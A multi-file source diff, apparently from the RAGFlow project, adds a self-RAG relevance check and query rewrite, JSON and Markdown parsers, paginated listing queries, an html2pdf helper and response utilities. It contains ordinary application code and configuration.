+       max_tokens = llm[0].max_tokens
    kbs = KnowledgebaseService.get_by_ids(dialog.kb_ids)
    embd_nms = list(set([kb.embd_id for kb in kbs]))
    if len(embd_nms) != 1:
@@ -110,20 +112,33 @@ def chat(dialog, messages, stream=True, **kwargs):
            prompt_config["system"] = prompt_config["system"].replace(
                "{%s}" % p["key"], " ")

-   rerank_mdl = None
-   if dialog.rerank_id:
-       rerank_mdl = LLMBundle(dialog.tenant_id, LLMType.RERANK, dialog.rerank_id)
-
    for _ in range(len(questions) // 2):
        questions.append(questions[-1])
    if "knowledge" not in [p["key"] for p in prompt_config["parameters"]]:
        kbinfos = {"total": 0, "chunks": [], "doc_aggs": []}
    else:
+       rerank_mdl = None
+       if dialog.rerank_id:
+           rerank_mdl = LLMBundle(dialog.tenant_id, LLMType.RERANK, dialog.rerank_id)
+       if prompt_config.get("keyword", False):
+           questions[-1] += keyword_extraction(chat_mdl, questions[-1])
        kbinfos = retrievaler.retrieval(" ".join(questions), embd_mdl, dialog.tenant_id, dialog.kb_ids, 1, dialog.top_n,
                                        dialog.similarity_threshold,
                                        dialog.vector_similarity_weight,
                                        doc_ids=kwargs["doc_ids"].split(",") if "doc_ids" in kwargs else None,
-                                       top=1024, aggs=False, rerank_mdl=rerank_mdl)
+                                       top=dialog.top_k, aggs=False, rerank_mdl=rerank_mdl)
        knowledges = [ck["content_with_weight"] for ck in kbinfos["chunks"]]
+       # self-rag
+       if dialog.prompt_config.get("self_rag") and not relevant(dialog.tenant_id, dialog.llm_id, questions[-1], knowledges):
+           questions[-1] = rewrite(dialog.tenant_id, dialog.llm_id, questions[-1])
+           kbinfos = retrievaler.retrieval(" ".join(questions), embd_mdl, dialog.tenant_id, dialog.kb_ids, 1, dialog.top_n,
+                                           dialog.similarity_threshold,
+                                           dialog.vector_similarity_weight,
+                                           doc_ids=kwargs["doc_ids"].split(",") if "doc_ids" in kwargs else None,
+                                           top=dialog.top_k, aggs=False, rerank_mdl=rerank_mdl)
+           knowledges = [ck["content_with_weight"] for ck in kbinfos["chunks"]]

    chat_logger.info(
        "{}->{}".format(" ".join(questions), "\n->".join(knowledges)))

@@ -136,7 +151,7 @@ def chat(dialog, messages, stream=True, **kwargs):

    msg = [{"role": "system", "content": prompt_config["system"].format(**kwargs)}]
    msg.extend([{"role": m["role"], "content": m["content"]}
                for m in messages if m["role"] != "system"])
    used_token_count, msg = message_fit_in(msg, int(max_tokens * 0.97))
    assert len(msg) >= 2, f"message_fit_in has bug: {msg}"

@@ -150,9 +165,9 @@ def chat(dialog, messages, stream=True, **kwargs):
    if knowledges and (prompt_config.get("quote", True) and kwargs.get("quote", True)):
        answer, idx = retrievaler.insert_citations(answer,
                                                   [ck["content_ltks"]
                                                    for ck in kbinfos["chunks"]],
                                                   [ck["vector"]
                                                    for ck in kbinfos["chunks"]],
                                                   embd_mdl,
                                                   tkweight=1 - dialog.vector_similarity_weight,
                                                   vtweight=dialog.vector_similarity_weight)
@@ -166,7 +181,7 @@ def chat(dialog, messages, stream=True, **kwargs):
    for c in refs["chunks"]:
        if c.get("vector"):
            del c["vector"]
-   if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api")>=0:
+   if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api") >= 0:
        answer += " Please set LLM API-Key in 'User Setting -> Model Providers -> API-Key'"
    return {"answer": answer, "reference": refs}

@@ -204,7 +219,7 @@ def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):
    def get_table():
        nonlocal sys_prompt, user_promt, question, tried_times
        sql = chat_mdl.chat(sys_prompt, [{"role": "user", "content": user_promt}], {
            "temperature": 0.06})
        print(user_promt, sql)
        chat_logger.info(f"“{question}”==>{user_promt} get SQL: {sql}")
        sql = re.sub(r"[\r\n]+", " ", sql.lower())
@@ -273,17 +288,19 @@ def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):

    # compose markdown table
    clmns = "|" + "|".join([re.sub(r"(/.*|([^()]+))", "", field_map.get(tbl["columns"][i]["name"],
                                                                        tbl["columns"][i]["name"])) for i in
                            clmn_idx]) + ("|Source|" if docid_idx and docid_idx else "|")

    line = "|" + "|".join(["------" for _ in range(len(clmn_idx))]) + \
           ("|------|" if docid_idx and docid_idx else "")

    rows = ["|" +
            "|".join([rmSpace(str(r[i])) for i in clmn_idx]).replace("None", " ") +
            "|" for r in tbl["rows"]]
    if quota:
        rows = "\n".join([r + f" ##{ii}$$ |" for ii, r in enumerate(rows)])
    else:
        rows = "\n".join([r + f" ##{ii}$$ |" for ii, r in enumerate(rows)])
    rows = re.sub(r"T[0-9]{2}:[0-9]{2}:[0-9]{2}(\.[0-9]+Z)?\|", "|", rows)

    if not docid_idx or not docnm_idx:
@@ -303,5 +320,40 @@ def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):
    return {
        "answer": "\n".join([clmns, line, rows]),
        "reference": {"chunks": [{"doc_id": r[docid_idx], "docnm_kwd": r[docnm_idx]} for r in tbl["rows"]],
                      "doc_aggs": [{"doc_id": did, "doc_name": d["doc_name"], "count": d["count"]}
                                   for did, d in doc_aggs.items()]}
    }


def relevant(tenant_id, llm_id, question, contents: list):
    chat_mdl = LLMBundle(tenant_id, LLMType.CHAT, llm_id)
    prompt = """
        You are a grader assessing the relevance of a retrieved document to a user question.
        It does not need to be a stringent test. The goal is to filter out erroneous retrievals.
        If the document contains keyword(s) or semantic meaning related to the user question, grade it as relevant.
        Give a binary 'yes' or 'no' score to indicate whether the document is relevant to the question.
        No other words are needed except 'yes' or 'no'.
    """
    if not contents:
        return False
    contents = "Documents: \n" + " - ".join(contents)
    contents = f"Question: {question}\n" + contents
    if num_tokens_from_string(contents) >= chat_mdl.max_length - 4:
        contents = encoder.decode(encoder.encode(contents)[:chat_mdl.max_length - 4])
    ans = chat_mdl.chat(prompt, [{"role": "user", "content": contents}], {"temperature": 0.01})
    if ans.lower().find("yes") >= 0:
        return True
    return False


def rewrite(tenant_id, llm_id, question):
    chat_mdl = LLMBundle(tenant_id, LLMType.CHAT, llm_id)
    prompt = """
        You are an expert at query expansion, generating paraphrases of a question.
        Relevant information cannot be retrieved from the knowledge base by using the user's question directly.
        You need to expand or paraphrase the user's question in multiple ways, such as using synonymous words/phrases,
        writing an abbreviation out in full, adding some extra descriptions or explanations,
        changing the way of expression, translating the original question into another language (English/Chinese), etc.
        Return 5 versions of the question, one of which is a translation.
        Just list the questions. No other words are needed.
    """
    ans = chat_mdl.chat(prompt, [{"role": "user", "content": question}], {"temperature": 0.8})
    return ans
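
# Taken together, relevant() and rewrite() implement the self-RAG pass wired into
# chat() above: retrieve, grade, and re-query once with an expanded question when
# the first pass looks irrelevant. A compact restatement of that control flow,
# where `retrieve` is a stand-in for the retrievaler.retrieval call (an
# assumption of this sketch):
#
#     def self_rag_pass(tenant_id, llm_id, question, retrieve):
#         # `retrieve` is a callable returning chunk texts for a question; it is
#         # not part of this module.
#         chunks = retrieve(question)
#         if not relevant(tenant_id, llm_id, question, chunks):
#             question = rewrite(tenant_id, llm_id, question)  # expand/paraphrase the query
#             chunks = retrieve(question)                      # one re-retrieval, as in chat()
#         return question, chunks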

@@ -59,6 +59,35 @@ class DocumentService(CommonService):

        return list(docs.dicts()), count

    @classmethod
    @DB.connection_context()
    def list_documents_in_dataset(cls, dataset_id, offset, count, order_by, descend, keywords):
        if keywords:
            docs = cls.model.select().where(
                (cls.model.kb_id == dataset_id),
                (fn.LOWER(cls.model.name).contains(keywords.lower()))
            )
        else:
            docs = cls.model.select().where(cls.model.kb_id == dataset_id)

        total = docs.count()

        if descend == 'True':
            docs = docs.order_by(cls.model.getter_by(order_by).desc())
        if descend == 'False':
            docs = docs.order_by(cls.model.getter_by(order_by).asc())

        docs = list(docs.dicts())
        docs_length = len(docs)

        if offset < 0 or offset > docs_length:
            raise IndexError("Offset is out of the valid range.")

        if count == -1:
            return docs[offset:], total

        return docs[offset:offset + count], total

    @classmethod
    @DB.connection_context()
    def insert(cls, doc):
@@ -182,6 +211,19 @@ class DocumentService(CommonService):
            return
        return docs[0]["tenant_id"]

    @classmethod
    @DB.connection_context()
    def get_embd_id(cls, doc_id):
        docs = cls.model.select(
            Knowledgebase.embd_id).join(
            Knowledgebase, on=(
                Knowledgebase.id == cls.model.kb_id)).where(
            cls.model.id == doc_id, Knowledgebase.status == StatusEnum.VALID.value)
        docs = docs.dicts()
        if not docs:
            return
        return docs[0]["embd_id"]

    @classmethod
    @DB.connection_context()
    def get_doc_id_by_doc_name(cls, doc_name):

@@ -164,12 +164,11 @@ class FileService(CommonService):
    @classmethod
    @DB.connection_context()
    def get_kb_folder(cls, tenant_id):
-       for root in cls.model.select().where(cls.model.tenant_id == tenant_id and
-                                            cls.model.parent_id == cls.model.id):
-           for folder in cls.model.select().where(cls.model.tenant_id == tenant_id and
-                                                  cls.model.parent_id == root.id and
-                                                  cls.model.name == KNOWLEDGEBASE_FOLDER_NAME
-                                                  ):
+       for root in cls.model.select().where(
+               (cls.model.tenant_id == tenant_id), (cls.model.parent_id == cls.model.id)):
+           for folder in cls.model.select().where(
+                   (cls.model.tenant_id == tenant_id), (cls.model.parent_id == root.id),
+                   (cls.model.name == KNOWLEDGEBASE_FOLDER_NAME)):
                return folder.to_dict()
        assert False, "Can't find the KB folder. Database init error."

@@ -304,4 +303,13 @@ class FileService(CommonService):
            "source_type": FileSource.KNOWLEDGEBASE
        }
        cls.save(**file)
        File2DocumentService.save(**{"id": get_uuid(), "file_id": file["id"], "document_id": doc["id"]})

    @classmethod
    @DB.connection_context()
    def move_file(cls, file_ids, folder_id):
        try:
            cls.filter_update((cls.model.id << file_ids, ), {'parent_id': folder_id})
        except Exception as e:
            print(e)
            raise RuntimeError("Database error (File move)!")

@@ -40,6 +40,31 @@ class KnowledgebaseService(CommonService):

        return list(kbs.dicts())

    @classmethod
    @DB.connection_context()
    def get_by_tenant_ids_by_offset(cls, joined_tenant_ids, user_id, offset, count, orderby, desc):
        kbs = cls.model.select().where(
            ((cls.model.tenant_id.in_(joined_tenant_ids) & (cls.model.permission ==
                                                            TenantPermission.TEAM.value)) | (
                cls.model.tenant_id == user_id))
            & (cls.model.status == StatusEnum.VALID.value)
        )
        if desc:
            kbs = kbs.order_by(cls.model.getter_by(orderby).desc())
        else:
            kbs = kbs.order_by(cls.model.getter_by(orderby).asc())

        kbs = list(kbs.dicts())

        kbs_length = len(kbs)
        if offset < 0 or offset > kbs_length:
            raise IndexError("Offset is out of the valid range.")

        if count == -1:
            return kbs[offset:]

        return kbs[offset:offset + count]

    @classmethod
    @DB.connection_context()
    def get_detail(cls, kb_id):

@@ -82,9 +82,9 @@ class TenantLLMService(CommonService):
        if model_config: model_config = model_config.to_dict()
        if not model_config:
            if llm_type in [LLMType.EMBEDDING, LLMType.RERANK]:
-               llm = LLMService.query(llm_name=llm_name)
+               llm = LLMService.query(llm_name=llm_name if llm_name else mdlnm)
                if llm and llm[0].fid in ["Youdao", "FastEmbed", "BAAI"]:
-                   model_config = {"llm_factory": llm[0].fid, "api_key": "", "llm_name": llm_name, "api_base": ""}
+                   model_config = {"llm_factory": llm[0].fid, "api_key": "", "llm_name": llm_name if llm_name else mdlnm, "api_base": ""}
            if not model_config:
                if llm_name == "flag-embedding":
                    model_config = {"llm_factory": "Tongyi-Qianwen", "api_key": "",

@@ -13,6 +13,7 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
+import os
import random

from api.db.db_utils import bulk_insert_into_db
@@ -102,6 +103,15 @@ class TaskService(CommonService):
    @classmethod
    @DB.connection_context()
    def update_progress(cls, id, info):
+       if os.environ.get("MACOS"):
+           if info["progress_msg"]:
+               cls.model.update(progress_msg=cls.model.progress_msg + "\n" + info["progress_msg"]).where(
+                   cls.model.id == id).execute()
+           if "progress" in info:
+               cls.model.update(progress=info["progress"]).where(
+                   cls.model.id == id).execute()
+           return

        with DB.lock("update_progress", -1):
            if info["progress_msg"]:
                cls.model.update(progress_msg=cls.model.progress_msg + "\n" + info["progress_msg"]).where(

@@ -69,6 +69,12 @@ default_llm = {
        "image2text_model": "gpt-4-vision-preview",
        "asr_model": "whisper-1",
    },
+   "Azure-OpenAI": {
+       "chat_model": "azure-gpt-35-turbo",
+       "embedding_model": "azure-text-embedding-ada-002",
+       "image2text_model": "azure-gpt-4-vision-preview",
+       "asr_model": "azure-whisper-1",
+   },
    "ZHIPU-AI": {
        "chat_model": "glm-3-turbo",
        "embedding_model": "embedding-2",
@@ -239,4 +245,5 @@ class RetCode(IntEnum, CustomEnum):
    RUNNING = 106
    PERMISSION_ERROR = 108
    AUTHENTICATION_ERROR = 109
+   UNAUTHORIZED = 401
    SERVER_ERROR = 500

@@ -38,7 +38,6 @@ from base64 import b64encode
from hmac import HMAC
from urllib.parse import quote, urlencode


requests.models.complexjson.dumps = functools.partial(
    json.dumps, cls=CustomJSONEncoder)

@@ -145,7 +144,7 @@ def server_error_response(e):
    if len(e.args) > 1:
        return get_json_result(
            retcode=RetCode.EXCEPTION_ERROR, retmsg=repr(e.args[0]), data=e.args[1])
-   if repr(e).find("index_not_found_exception") >=0:
+   if repr(e).find("index_not_found_exception") >= 0:
        return get_json_result(retcode=RetCode.EXCEPTION_ERROR, retmsg="No chunk found, please upload file and parse it.")

    return get_json_result(retcode=RetCode.EXCEPTION_ERROR, retmsg=repr(e))
@ -235,3 +234,36 @@ def cors_reponse(retcode=RetCode.SUCCESS,
|
||||
response.headers["Access-Control-Allow-Headers"] = "*"
|
||||
response.headers["Access-Control-Expose-Headers"] = "Authorization"
|
||||
return response
|
||||
|
||||
def construct_result(code=RetCode.DATA_ERROR, message='data is missing'):
|
||||
import re
|
||||
result_dict = {"code": code, "message": re.sub(r"rag", "seceum", message, flags=re.IGNORECASE)}
|
||||
response = {}
|
||||
for key, value in result_dict.items():
|
||||
if value is None and key != "code":
|
||||
continue
|
||||
else:
|
||||
response[key] = value
|
||||
return jsonify(response)
|
||||
|
||||
|
||||
def construct_json_result(code=RetCode.SUCCESS, message='success', data=None):
|
||||
if data is None:
|
||||
return jsonify({"code": code, "message": message})
|
||||
else:
|
||||
return jsonify({"code": code, "message": message, "data": data})
|
||||
|
||||
|
||||
def construct_error_response(e):
|
||||
stat_logger.exception(e)
|
||||
try:
|
||||
if e.code == 401:
|
||||
return construct_json_result(code=RetCode.UNAUTHORIZED, message=repr(e))
|
||||
except BaseException:
|
||||
pass
|
||||
if len(e.args) > 1:
|
||||
return construct_json_result(code=RetCode.EXCEPTION_ERROR, message=repr(e.args[0]), data=e.args[1])
|
||||
if repr(e).find("index_not_found_exception") >=0:
|
||||
return construct_json_result(code=RetCode.EXCEPTION_ERROR, message="No chunk found, please upload file and parse it.")
|
||||
|
||||
return construct_json_result(code=RetCode.EXCEPTION_ERROR, message=repr(e))
|
||||
|
||||
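The three `construct_*` helpers added above standardize JSON responses. A minimal usage sketch, assuming a Flask view function; the route, blueprint name, and payload are illustrative, not from this diff:

```python
# Hypothetical endpoint wiring the new helpers together.
@manager.route("/example", methods=["GET"])  # `manager` is an assumed blueprint
def example():
    try:
        data = {"status": "ok"}  # stand-in for a real service call
        return construct_json_result(code=RetCode.SUCCESS, data=data)
    except Exception as e:
        # Logs the exception and wraps it in a uniform JSON error body.
        return construct_error_response(e)
```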
api/utils/web_utils.py (new file, 80 lines)
@@ -0,0 +1,80 @@
import re
import json
import base64

from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.chrome.service import Service
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.expected_conditions import staleness_of
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.common.by import By


def html2pdf(
        source: str,
        timeout: int = 2,
        install_driver: bool = True,
        print_options: dict = {},
):
    result = __get_pdf_from_html(source, timeout, install_driver, print_options)
    return result


def __send_devtools(driver, cmd, params={}):
    resource = "/session/%s/chromium/send_command_and_get_result" % driver.session_id
    url = driver.command_executor._url + resource
    body = json.dumps({"cmd": cmd, "params": params})
    response = driver.command_executor._request("POST", url, body)

    if not response:
        raise Exception(response.get("value"))

    return response.get("value")


def __get_pdf_from_html(
        path: str,
        timeout: int,
        install_driver: bool,
        print_options: dict
):
    webdriver_options = Options()
    webdriver_prefs = {}
    webdriver_options.add_argument("--headless")
    webdriver_options.add_argument("--disable-gpu")
    webdriver_options.add_argument("--no-sandbox")
    webdriver_options.add_argument("--disable-dev-shm-usage")
    webdriver_options.experimental_options["prefs"] = webdriver_prefs

    webdriver_prefs["profile.default_content_settings"] = {"images": 2}

    if install_driver:
        service = Service(ChromeDriverManager().install())
        driver = webdriver.Chrome(service=service, options=webdriver_options)
    else:
        driver = webdriver.Chrome(options=webdriver_options)

    driver.get(path)

    try:
        WebDriverWait(driver, timeout).until(
            staleness_of(driver.find_element(by=By.TAG_NAME, value="html"))
        )
    except TimeoutException:
        calculated_print_options = {
            "landscape": False,
            "displayHeaderFooter": False,
            "printBackground": True,
            "preferCSSPageSize": True,
        }
        calculated_print_options.update(print_options)
        result = __send_devtools(
            driver, "Page.printToPDF", calculated_print_options)
        driver.quit()
        return base64.b64decode(result["data"])


def is_valid_url(url: str) -> bool:
    return bool(re.match(r"(https?|ftp|file)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+[-A-Za-z0-9+&@#/%=~_|]", url))
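`html2pdf` renders a page in headless Chrome and returns the PDF bytes via the DevTools `Page.printToPDF` command; note that it only returns on the `TimeoutException` path, i.e. once the page has stopped changing for `timeout` seconds. A small usage sketch, assuming Chrome/Chromium is available on the host; the URL and output path are illustrative:

```python
# Validate the URL first, then render it to a local PDF file.
url = "https://example.com"
if is_valid_url(url):
    pdf_bytes = html2pdf(url, timeout=2)
    with open("example.pdf", "wb") as f:
        f.write(pdf_bytes)
```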
@@ -15,6 +15,8 @@ minio:
  host: 'minio:9000'
es:
  hosts: 'http://es01:9200'
  username: 'elastic'
  password: 'infini_rag_flow'
redis:
  db: 1
  password: 'infini_rag_flow'
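This hunk adds basic-auth credentials for the Elasticsearch connection (security is now enabled in the ES container; see the compose changes further down). A quick connectivity check, as a sketch assuming the `elasticsearch` 8.x Python client and the hostnames above:

```python
from elasticsearch import Elasticsearch

# Credentials mirror service_conf.yaml; replace the host if you are outside
# the compose network (e.g. http://localhost:1200 with the default port mapping).
es = Elasticsearch("http://es01:9200", basic_auth=("elastic", "infini_rag_flow"))
print(es.info())
```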
@@ -1,7 +1,20 @@

# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

from .pdf_parser import RAGFlowPdfParser as PdfParser, PlainParser
from .docx_parser import RAGFlowDocxParser as DocxParser
from .excel_parser import RAGFlowExcelParser as ExcelParser
from .ppt_parser import RAGFlowPptParser as PptParser
from .html_parser import RAGFlowHtmlParser as HtmlParser
from .json_parser import RAGFlowJsonParser as JsonParser
from .markdown_parser import RAGFlowMarkdownParser as MarkdownParser
@@ -1,4 +1,16 @@
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

from docx import Document
import re
import pandas as pd
@@ -101,19 +113,24 @@ class RAGFlowDocxParser:
    def __call__(self, fnm, from_page=0, to_page=100000):
        self.doc = Document(fnm) if isinstance(
            fnm, str) else Document(BytesIO(fnm))
        pn = 0
        secs = []
        pn = 0  # parsed page
        secs = []  # parsed contents
        for p in self.doc.paragraphs:
            if pn > to_page:
                break
            if from_page <= pn < to_page and p.text.strip():
                secs.append((p.text, p.style.name))

            runs_within_single_paragraph = []  # save runs within the range of pages
            for run in p.runs:
                if 'lastRenderedPageBreak' in run._element.xml:
                    pn += 1
                    continue
                if 'w:br' in run._element.xml and 'type="page"' in run._element.xml:
                if pn > to_page:
                    break
                if from_page <= pn < to_page and p.text.strip():
                    runs_within_single_paragraph.append(run.text)  # append run.text first

                # wrap page break checker into a static method
                if RAGFlowDocxParser.has_page_break(run._element.xml):
                    pn += 1

            secs.append(("".join(runs_within_single_paragraph), p.style.name))  # then concat run.text as part of the paragraph

        tbls = [self.__extract_table_content(tb) for tb in self.doc.tables]
        return secs, tbls
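The rewritten `__call__` delegates page-break detection to a `RAGFlowDocxParser.has_page_break` static method that this hunk references but does not show. A plausible sketch, reconstructed from the inline checks the old code used (rendered page breaks and explicit `w:br type="page"` runs); treat it as an assumption, not the committed implementation:

```python
@staticmethod
def has_page_break(run_xml: str) -> bool:
    # A run marks a page boundary if Word rendered a break there, or if it
    # carries an explicit page-break element.
    return ('lastRenderedPageBreak' in run_xml
            or ('w:br' in run_xml and 'type="page"' in run_xml))
```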
@@ -1,4 +1,16 @@
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

from openpyxl import load_workbook
import sys
from io import BytesIO
deepdoc/parser/json_parser.py (new file, 116 lines)
@@ -0,0 +1,116 @@
# -*- coding: utf-8 -*-
# The following documents are mainly referenced, and only adaptation modifications have been made
# from https://github.com/langchain-ai/langchain/blob/master/libs/text-splitters/langchain_text_splitters/json.py

import json
from typing import Any, Dict, List, Optional
from rag.nlp import find_codec


class RAGFlowJsonParser:
    def __init__(
        self, max_chunk_size: int = 2000, min_chunk_size: Optional[int] = None
    ):
        super().__init__()
        self.max_chunk_size = max_chunk_size * 2
        self.min_chunk_size = (
            min_chunk_size
            if min_chunk_size is not None
            else max(max_chunk_size - 200, 50)
        )

    def __call__(self, binary):
        encoding = find_codec(binary)
        txt = binary.decode(encoding, errors="ignore")
        json_data = json.loads(txt)
        chunks = self.split_json(json_data, True)
        sections = [json.dumps(l, ensure_ascii=False) for l in chunks if l]
        return sections

    @staticmethod
    def _json_size(data: Dict) -> int:
        """Calculate the size of the serialized JSON object."""
        return len(json.dumps(data, ensure_ascii=False))

    @staticmethod
    def _set_nested_dict(d: Dict, path: List[str], value: Any) -> None:
        """Set a value in a nested dictionary based on the given path."""
        for key in path[:-1]:
            d = d.setdefault(key, {})
        d[path[-1]] = value

    def _list_to_dict_preprocessing(self, data: Any) -> Any:
        if isinstance(data, dict):
            # Process each key-value pair in the dictionary
            return {k: self._list_to_dict_preprocessing(v) for k, v in data.items()}
        elif isinstance(data, list):
            # Convert the list to a dictionary with index-based keys
            return {
                str(i): self._list_to_dict_preprocessing(item)
                for i, item in enumerate(data)
            }
        else:
            # Base case: the item is neither a dict nor a list, so return it unchanged
            return data

    def _json_split(
        self,
        data: Dict[str, Any],
        current_path: Optional[List[str]] = None,
        chunks: Optional[List[Dict]] = None,
    ) -> List[Dict]:
        """
        Split json into maximum size dictionaries while preserving structure.
        """
        current_path = current_path or []
        chunks = chunks or [{}]
        if isinstance(data, dict):
            for key, value in data.items():
                new_path = current_path + [key]
                chunk_size = self._json_size(chunks[-1])
                size = self._json_size({key: value})
                remaining = self.max_chunk_size - chunk_size

                if size < remaining:
                    # Add item to current chunk
                    self._set_nested_dict(chunks[-1], new_path, value)
                else:
                    if chunk_size >= self.min_chunk_size:
                        # Chunk is big enough, start a new chunk
                        chunks.append({})

                    # Iterate
                    self._json_split(value, new_path, chunks)
        else:
            # handle single item
            self._set_nested_dict(chunks[-1], current_path, data)
        return chunks

    def split_json(
        self,
        json_data: Dict[str, Any],
        convert_lists: bool = False,
    ) -> List[Dict]:
        """Splits JSON into a list of JSON chunks"""

        if convert_lists:
            chunks = self._json_split(self._list_to_dict_preprocessing(json_data))
        else:
            chunks = self._json_split(json_data)

        # Remove the last chunk if it's empty
        if not chunks[-1]:
            chunks.pop()
        return chunks

    def split_text(
        self,
        json_data: Dict[str, Any],
        convert_lists: bool = False,
        ensure_ascii: bool = True,
    ) -> List[str]:
        """Splits JSON into a list of JSON formatted strings"""

        chunks = self.split_json(json_data=json_data, convert_lists=convert_lists)

        # Convert to string
        return [json.dumps(chunk, ensure_ascii=ensure_ascii) for chunk in chunks]
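A short usage sketch of the new parser; the sample document and sizes are illustrative. `__call__` decodes the raw bytes, splits the JSON into size-bounded chunks (converting lists to index-keyed dicts first), and serializes each chunk back to a string:

```python
import json

parser = RAGFlowJsonParser(max_chunk_size=200)
doc = {"title": "demo", "items": [{"k": i, "text": "x" * 50} for i in range(20)]}
sections = parser(json.dumps(doc).encode("utf-8"))
# Each element is a JSON string small enough to embed as one chunk.
print(len(sections), sections[0][:80])
```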
deepdoc/parser/markdown_parser.py (new file, 44 lines)
@@ -0,0 +1,44 @@
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import re

class RAGFlowMarkdownParser:
    def __init__(self, chunk_token_num=128):
        self.chunk_token_num = int(chunk_token_num)

    def extract_tables_and_remainder(self, markdown_text):
        # Standard Markdown table
        table_pattern = re.compile(
            r'''
            (?:\n|^)
            (?:\|.*?\|.*?\|.*?\n)
            (?:\|(?:\s*[:-]+[-| :]*\s*)\|.*?\n)
            (?:\|.*?\|.*?\|.*?\n)+
            ''', re.VERBOSE)
        tables = table_pattern.findall(markdown_text)
        remainder = table_pattern.sub('', markdown_text)

        # Borderless Markdown table
        no_border_table_pattern = re.compile(
            r'''
            (?:\n|^)
            (?:\S.*?\|.*?\n)
            (?:(?:\s*[:-]+[-| :]*\s*).*?\n)
            (?:\S.*?\|.*?\n)+
            ''', re.VERBOSE)
        no_border_tables = no_border_table_pattern.findall(remainder)
        tables.extend(no_border_tables)
        remainder = no_border_table_pattern.sub('', remainder)

        return remainder, tables
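`extract_tables_and_remainder` pulls pipe tables (bordered first, then borderless) out of the raw Markdown so they can be chunked separately from prose. A minimal usage sketch with an illustrative document:

```python
md = """Intro paragraph.

| a | b |
|---|---|
| 1 | 2 |

Closing paragraph.
"""
parser = RAGFlowMarkdownParser()
remainder, tables = parser.extract_tables_and_remainder(md)
# `tables` holds the matched table block; `remainder` keeps the surrounding prose.
print(len(tables), remainder.strip().splitlines()[0])
```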
@@ -1,4 +1,16 @@
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import os
import random

@@ -940,7 +952,7 @@ class RAGFlowPdfParser:
                fnm, str) else pdfplumber.open(BytesIO(fnm))
            self.page_images = [p.to_image(resolution=72 * zoomin).annotated for i, p in
                                enumerate(self.pdf.pages[page_from:page_to])]
            self.page_chars = [[c for c in page.chars if self._has_color(c)] for page in
            self.page_chars = [[{**c, 'top': max(0, c['top'] - 10), 'bottom': max(0, c['bottom'] - 10)} for c in page.chars if self._has_color(c)] for page in
                               self.pdf.pages[page_from:page_to]]
            self.total_page = len(self.pdf.pages)
        except Exception as e:
@@ -1009,6 +1021,8 @@ class RAGFlowPdfParser:

        self.page_cum_height = np.cumsum(self.page_cum_height)
        assert len(self.page_cum_height) == len(self.page_images) + 1
        if len(self.boxes) == 0 and zoomin < 9: self.__images__(fnm, zoomin * 3, page_from,
                                                                page_to, callback)

    def __call__(self, fnm, need_image=True, zoomin=3, return_html=False):
        self.__images__(fnm, zoomin)
@@ -10,6 +10,7 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#

from io import BytesIO
from pptx import Presentation

@@ -1,3 +1,16 @@
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import datetime

@@ -1,3 +1,16 @@
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import re,json,os
import pandas as pd
from rag.nlp import rag_tokenizer

@@ -1,3 +1,16 @@
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
